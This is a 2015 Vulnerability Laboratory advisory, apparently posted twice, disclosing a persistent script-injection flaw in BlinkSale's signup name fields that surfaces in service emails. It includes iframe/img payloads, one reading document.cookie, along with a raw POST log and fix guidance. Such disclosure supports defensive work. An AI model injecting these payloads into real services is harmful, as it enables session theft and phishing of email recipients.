Vulnerability Laboratory ID (VL-ID):
====================================
1416
Common Vulnerability Scoring System:
====================================
3.6
Product & Service Introduction:
===============================
We like to get paid. Weâ??re sure you feel the same. So while you can use Blinksale and get paid by check, our integration
with Stripe* makes it easy to get paid in a flash. Just sign up at Stripe, put your credentials into Blinksale, and youâ??re
all set to accept credit card payments on your invoices!
(Copy of the Vendor Homepage: https://www.blinksale.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation mail encoding web vulnerability in the official BlinkSale web-application.
Technical Details & Description:
================================
A persistent input validation mail encoding vulnerability has been discovered in the official BlinkSale company web-application.
The issue allows remote attackers to inject own malicious web context to the application-side of a vulnerable module or function.
The security vulnerability is located in the `firstname` and `lastname` input field values of the `signups` file. Remote attackers and
local privileged application user accounts can exploit the issue to execute persistent malicious context in blinksale service mails.
The injection takes place in the signup POST method request with the vulnerable input values. The execution of the script code occurs
on the application-side in the email after the introduction word `Hello` [X Username]. Attackers are able to inject iframes, img sources
with onload alert or other script code tags. The service does not encode the input and has also no input restriction. After the code has
been saved during the registration the internal service takes the wrong encoded dbms entries and stream them back in a notification mail
to the users inbox.
The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss
(common vulnerability scoring system) count of 3.6. If the issue is existing in the main service values the other services can be affected by the
issue too. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged
customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent
phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context.
Proof of Concept (PoC):
=======================
The application-side mail encoding web vulnerability can be exploited by remote attackers with low privileged application user accounta and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Open the signup website of the blinksale portal (https://application.blinksale.com/signups)
2. Include random values to the email, password and inject a script code payload as firstname and lastname to the input fields. Save!
3. Go to the mail inbox and wait for the automatic reply with the persistent injected script code
4. Successful reproduce of the remote mail encoding vulnerability
Note: The issue can stream persistent malicious context in mails to existing users, new users or random emails to phish or spam!
<html>
<head>
<title>Any feedback on Blinksale?</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>Any feedback on Blinksale?</td></tr><tr><td><b>Von: </b>Patrick Dodd <patrick (at) blinksale (dot) com [email concealed]></td></tr><tr><td><b>Datum: </b>03.02.2015 20:45</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>bkm (at) evolution-sec (dot) com [email concealed]</td></tr></table><br>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; ">
<style type="text/css">
body { max-width:500px; margin:10; padding: 0; font-family: sans-serif; font-size:13px; font-style: normal;}
h1 { font-size: 16px; line-height:20px; }
h2 { font-size: 14px; line-height:18px; }
p { font-size: 13px; line-height: 16px; }
.center { text-align: center }
.unsubscribe { color:#727272; line-height:18px; }
.unsubscribe a { color: #333 }
@media only screen and (max-device-width: 480px) {
body { width: 320px !important; margin: 0; padding: 0; }
td img { height:auto !important; max-width:100% !important;}
}
</style>
</head>
<body style="max-width: 500px; font-family: sans-serif; font-size: 13px; font-style: normal; margin: 10; padding: 0;">
<!-- We'll replace this content tag with whatever you write in your email -->
<p style="font-size: 13px; line-height: 16px;">"><iframe src="http://www.evolution-sec.com" onload='alert(document.cookie)<' i noticed that your blinksale trial has expired.><p style="font-size: 13px; line-height: 16px;">If you meant to keep your Blinksale account, you can do so by going to your Blinksale <a href="http://cio.blinksale.com/e/c/eyJlbWFpbF9pZCI6Ik1UQXpOVEU2RmxQN0FtU
UFBbk1BRmhQdkdnRkxBN1plckJVdUdGVFJKRWdCY3pveE1qZ3hPVGdBIiwicG9zaXRpb24iO
jAsImhyZWYiOiJodHRwczovL3Rlc3RlcjIzLmJsaW5rc2FsZS5jb20vc2V0dGluZ3Mvc3Vic
2NyaXB0aW9uIn0=" target="_blank" rel="nofollow" text="Billing Information">Billing Information</a> page.</p>
<p style="font-size: 13px; line-height: 16px;">If you haven't already signed up for a paid plan, do you care to share any feedback? </p>
<p style="font-size: 13px; line-height: 16px;">What did you like? What didn't you like? Did you go with another invoicing solution? If so, why?</p>
<p style="font-size: 13px; line-height: 16px;">All the best,</p>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable firstname and lastname input fields in the signups module.
Encode and parse the values that is get send in a notification to welcome user/customer accounts to prevent an application-side execution.
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the blinksale web-application is estimated as medium. (CVSS 3.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.
===============
BlinkSale Bug Bounty #1 - Encode & Validation Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1416
Release Date:
=============
2015-02-06
Vulnerability Laboratory ID (VL-ID):
====================================
1416
Common Vulnerability Scoring System:
====================================
3.6
Product & Service Introduction:
===============================
We like to get paid. Weâ??re sure you feel the same. So while you can use Blinksale and get paid by check, our integration
with Stripe* makes it easy to get paid in a flash. Just sign up at Stripe, put your credentials into Blinksale, and youâ??re
all set to accept credit card payments on your invoices!
(Copy of the Vendor Homepage: https://www.blinksale.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation mail encoding web vulnerability in the official BlinkSale web-application.
Vulnerability Disclosure Timeline:
==================================
2015-01-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2015-01-20: Vendor Notification (BlinksaleSecurity Team)
2015-01-26: Vendor Response/Feedback (BlinksaleSecurity Team)
2015-02-03: Vendor Fix/Patch (Blinksale Developer Team)
2015-02-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Doublewide Partners
Product: Blinksale 2015 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation mail encoding vulnerability has been discovered in the official BlinkSale company web-application.
The issue allows remote attackers to inject own malicious web context to the application-side of a vulnerable module or function.
The security vulnerability is located in the `firstname` and `lastname` input field values of the `signups` file. Remote attackers and
local privileged application user accounts can exploit the issue to execute persistent malicious context in blinksale service mails.
The injection takes place in the signup POST method request with the vulnerable input values. The execution of the script code occurs
on the application-side in the email after the introduction word `Hello` [X Username]. Attackers are able to inject iframes, img sources
with onload alert or other script code tags. The service does not encode the input and has also no input restriction. After the code has
been saved during the registration the internal service takes the wrong encoded dbms entries and stream them back in a notification mail
to the users inbox.
The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss
(common vulnerability scoring system) count of 3.6. If the issue is existing in the main service values the other services can be affected by the
issue too. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged
customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent
phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] signups
Vulnerable Parameter(s):
[+] firstname
[+] lastname
Affected Module(s):
[+] Welcome to Blinksale!
Proof of Concept (PoC):
=======================
The application-side mail encoding web vulnerability can be exploited by remote attackers with low privileged application user accounta and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Open the signup website of the blinksale portal (https://application.blinksale.com/signups)
2. Include random values to the email, password and inject a script code payload as firstname and lastname to the input fields. Save!
3. Go to the mail inbox and wait for the automatic reply with the persistent injected script code
4. Successful reproduce of the remote mail encoding vulnerability
Note: The issue can stream persistent malicious context in mails to existing users, new users or random emails to phish or spam!
PoC: Welcome to Blinksale!
<table class="content" cellpadding="0" cellspacing="0" border="0" style="border-collapse: collapse; mso-table-lspace: 0pt;
mso-table-rspace: 0pt; width: 100%; margin: 0; padding: 0;">
<tbody>
<tr>
<td style="vertical-align: top; text-align: left; font-family: Helvetica, Arial, Georgia, sans-serif; font-size: 16px;
line-height: 24px; font-weight: 400; margin: 0; padding: 0; border: none;" align="left" valign="top">
<h1 style="font-family: Helvetica, Arial, Georgia, sans-serif; font-size: 22px; line-height: 24px; font-weight: 700; color: #333333
!important; margin: 0; padding: 0 0 20px;">Hello "><[APPLICATION-SIDE SCRIPT CODE EXECUTION VULNERABILITY!]iframe src="a" onload='alert("PENTEST")'>
<p style="font-family: Helvetica, Arial, Georgia, sans-serif; font-size: 16px; line-height: 24px; font-weight: 400;
margin: 0; padding: 0 0 20px; border: none;">Welcome to Blinksale, the easiest way to send invoices online! Please save this
email as it contains important information about your account.</p>
<p style="font-family: Helvetica, Arial, Georgia, sans-serif; font-size: 16px; line-height: 24px; font-weight: 400;
margin: 0; padding: 0; border: none;">Your Account Details:</p>
<ul style="margin: 0; padding: 0 0 20px 15px; list-style: none;">
<li style="font-family: Helvetica, Arial, Georgia, sans-serif; font-size: 16px; line-height: 24px; font-weight:
400; margin: 0; padding: 0; list-style: disc inside;">Your Blinksale homepage is: <a style="color: #0099ff; text-decoration: none; outline: none;"
href="http://cio.blinksale.com/e/c/eyJlbWFpbF9pZCI6Ik1UQXpOVEU2RmxQN0FtU
UFBbk1BRmhQdkdnRkxBN1plckJVdUdGUzlYY2dCY3pvMU16UXhOd
0E9IiwicG9zaXRpb24iOjAsImhyZWYiOiJodHRwczovL3Rlc3RlcjIzLmJsaW5rc2FsZS5jb
20ifQ==">https://tester23.blinksale.com</a>
</li>
--- PoC Session Logs [POST] (Inject)---
20:49:10.401[466ms][total 466ms] Status: 302[Found]
POST https://application.blinksale.com/signups Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[102] Mime Type[text/html]
Request Header:
Host[application.blinksale.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-
US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://application.blinksale.com/signup]
Cookie[_ga=GA1.2.1597400543.1421696385; _gat=1;
_bs1_session=BAh7CkkiCmZsYXNoBjoGRUZJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g
6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPc2Vzc2lvbl9pZCIlMTdhN2YyYmM
zNzk1NTg3YzU5NGM3MmI0OTYyZTNkMzU6EF9jc3JmX3Rva2VuSSIxSzZDL0JqUGd5dXk1bTh
rOSsvZ0Mrek44b1VzTk5jMjlJdE5ZZjJ
JeVB5Yz0GOwBGOhxhbmFseXRpY2FsX2dhX2JsaW5rc2FsZVsAOhZhbmFseXRpY2FsX2Fkcm9
sbFsA--dcc12bdbc4f03f051603c5b9bda8c9097b3fdce6;
SnapABugRef=https%3A%2F%2Fapplication.blinksale.com%2Fsignup%20https%3A%
2F%2Fwww.blinksale.com%2F;
SnapABugHistory=1#; SnapABugVisit=3#1421696408; SnapABugChatWindow=false|0|-1,0,-1,0; __ar_v4=RKJIJ445EBHOVP4E26ZTZF%3A20150118%3A3%7
COPBKELH4GFBMBJGM76CDSD%3A20150118%3A3%7C4ZEUEB72Y5AGLAYIRHCWUL%3A201501
18%3A3; _cioid=59631;
_cio=bbf0ad6b-9167-ef35-541a-173be03a58bd]
Connection[keep-alive]
POST-Daten:
authenticity_token[K6C%2FBjPgyuy5m8k9%2B%2FgC%2BzN8oUsNNc29ItNYf2IyPyc%3
D]
sign_up%5Bcode%5D[]
sign_up%5Bfirst_name%5D[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E
%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
sign_up%5Blast_name%5D[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%
22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
sign_up%5Bemail%5D[admin%40evolution-sec.com]
sign_up%5Baddress%5D[]
sign_up%5Bdomain%5D[pentester7331]
sign_up%5Bpassword%5D[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%2
2%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
sign_up%5Bpassword_confirmation%5D[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2
520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
Response Header:
Cache-Control[no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0]
Content-Type[text/html; charset=utf-8]
Date[Mon, 19 Jan 2015 19:49:12 GMT]
Location[https://pentester7331.blinksale.com/]
Pragma[no-cache]
Server[nginx]
Set-Cookie[_bs1_session=BAh7C0kiCmZsYXNoBjoGRUZJQzonQWN0aW9uQ29udHJvbGxl
cjo6Rmxhc2g6OkZsYXNoSGFzaHsHOhhjb252ZXJzaW9uX3RyYWNraW5nVDoMc3VjY2Vzc0lD
Oh5BY3RpdmV
TdXBwb3J0OjpTYWZlQnVmZmVyIgGfPHN0cm9uZz5XZWxjb21lICZxdW90OyZndDsmbHQ7JnF
1b3Q7Jmx0O2ltZyBzcm
M9JnF1b3Q7eCZxdW90OyZndDslMjAlMjAmZ3Q7JnF1b3Q7Jmx0O2lmcmFtZSBzcmM9YSZndD
slMjAmbHQ7aWZyYW1lJmd0OywgeW91ciBhY2NvdW50IGhhcyBiZWVuIGNyZWF0ZWQhPC9zdH
Jvbmc
%2BBjsARgY6CkB1c2Vkewc7B0Y7CEY6D3Nlc3Npb25faWQiJTE3YTdmMmJjMzc5NTU4N2M1O
TRjNzJiNDk2MmUzZDM1OhBfY3NyZl90b2tlbkkiMUs2Qy9CalBneXV5NW04azkrL2dDK3pOO
G9Vc05OYz
I5SXROWWYySXlQeWM9BjsARjocYW5hbHl0aWNhbF9nYV9ibGlua3NhbGVbBlsHOgpldmVudE
kiFWFjY291b
nRfY3JlYXRpb24GOwBGOhZhbmFseXRpY2FsX2Fkcm9sbFsGWwc7DkAOOgx1c2VyX2lkaQMqB
DQ%3D--18531b9ae0baf8456e5f0e46055e512ce9699305; domain=.blinksale.com; path=/; secure; HttpOnly]
Status[302 Found]
Strict-Transport-Security[max-age=631152000; includeSubdomains]
x-content-type-options[nosniff]
X-Frame-Options[DENY]
X-Runtime[297]
X-XSS-Protection[1; mode=block]
Content-Length[102]
Connection[keep-alive]
-
Status: Welcome "><"<img src="x">%20%20>"<iframe src=a>%20<iframe>, your account has been created!
PoC2:
<html>
<head>
<title>Any feedback on Blinksale?</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>Any feedback on Blinksale?</td></tr><tr><td><b>Von: </b>Patrick Dodd <patrick (at) blinksale (dot) com [email concealed]></td></tr><tr><td><b>Datum: </b>03.02.2015 20:45</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>bkm (at) evolution-sec (dot) com [email concealed]</td></tr></table><br>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; ">
<style type="text/css">
body { max-width:500px; margin:10; padding: 0; font-family: sans-serif; font-size:13px; font-style: normal;}
h1 { font-size: 16px; line-height:20px; }
h2 { font-size: 14px; line-height:18px; }
p { font-size: 13px; line-height: 16px; }
.center { text-align: center }
.unsubscribe { color:#727272; line-height:18px; }
.unsubscribe a { color: #333 }
@media only screen and (max-device-width: 480px) {
body { width: 320px !important; margin: 0; padding: 0; }
td img { height:auto !important; max-width:100% !important;}
}
</style>
</head>
<body style="max-width: 500px; font-family: sans-serif; font-size: 13px; font-style: normal; margin: 10; padding: 0;">
<!-- We'll replace this content tag with whatever you write in your email -->
<p style="font-size: 13px; line-height: 16px;">"><iframe src="http://www.evolution-sec.com" onload='alert(document.cookie)<' i noticed that your blinksale trial has expired.><p style="font-size: 13px; line-height: 16px;">If you meant to keep your Blinksale account, you can do so by going to your Blinksale <a href="http://cio.blinksale.com/e/c/eyJlbWFpbF9pZCI6Ik1UQXpOVEU2RmxQN0FtU
UFBbk1BRmhQdkdnRkxBN1plckJVdUdGVFJKRWdCY3pveE1qZ3hPVGdBIiwicG9zaXRpb24iO
jAsImhyZWYiOiJodHRwczovL3Rlc3RlcjIzLmJsaW5rc2FsZS5jb20vc2V0dGluZ3Mvc3Vic
2NyaXB0aW9uIn0=" target="_blank" rel="nofollow" text="Billing Information">Billing Information</a> page.</p>
<p style="font-size: 13px; line-height: 16px;">If you haven't already signed up for a paid plan, do you care to share any feedback? </p>
<p style="font-size: 13px; line-height: 16px;">What did you like? What didn't you like? Did you go with another invoicing solution? If so, why?</p>
<p style="font-size: 13px; line-height: 16px;">All the best,</p>
<p class="unsubscribe" style="font-size: 13px; line-height: 18px; color: #727272;">-------<br>
Don't want to receive amazing emails from us?
<a class="untracked" href="https://manage.customer.io/emails/MTAzNTE6FlP7AmQAAnMAFhPvGgFLA7Ze
rBUuGFTRJEgBczoxMjgxOTgA/unsubscribe" style="color: #333;">Unsubscribe</a>
</p>
</iframe></p>
<img src="http://cio.blinksale.com/e/o/eyJlbWFpbF9pZCI6Ik1UQXpOVEU2RmxQN0FtUU
FBbk1BRmhQdkdnRkxBN1plckJVdUdGVFJKRWdCY3pveE1qZ3hPVGdBIn0=">
</body>
</html>
</body>
</html>
Reference(s):
https://application.blinksale.com/signup
https://pentester7331.blinksale.com/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable firstname and lastname input fields in the signups module.
Encode and parse the values that is get send in a notification to welcome user/customer accounts to prevent an application-side execution.
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the blinksale web-application is estimated as medium. (CVSS 3.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]�
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt
[ reply ]